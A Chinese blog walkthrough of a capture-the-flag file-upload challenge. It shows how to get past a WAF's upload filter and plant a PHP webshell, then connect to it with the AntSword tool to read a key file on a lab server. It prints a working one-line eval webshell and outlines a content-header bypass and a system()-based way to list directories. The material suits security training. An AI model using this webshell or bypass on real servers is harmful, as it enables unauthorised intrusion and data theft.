文件上传题型

题目:通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell,答案就在根目录下key.php文件中。

先去上传1.php文件,里面编写一句话木马:<?php eval($_POST[c]);?>

1、通过抓包来获取内容,发现并没有上传成功

2、 通过后缀名绕过上传:失败


3、通过内容头部绕过:成功(也有可能屏蔽eval函数,使用system函数或者assert()函数

去访问上传的路径:http://192.168.129.128:82/vulnerabilities/1.phtml

使用蚁剑webshell进行连接:http://192.168.129.128:82/vulnerabilities/1.phtml

进入webshell后台管理界面:

获取到key.php值;


另一种办法:

1、上传system()函数去查看当前路径里的文件


2、查看上一级目录下的文件,发现key.php文件


3、打开上一级目录下key.php文件,找到key值

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值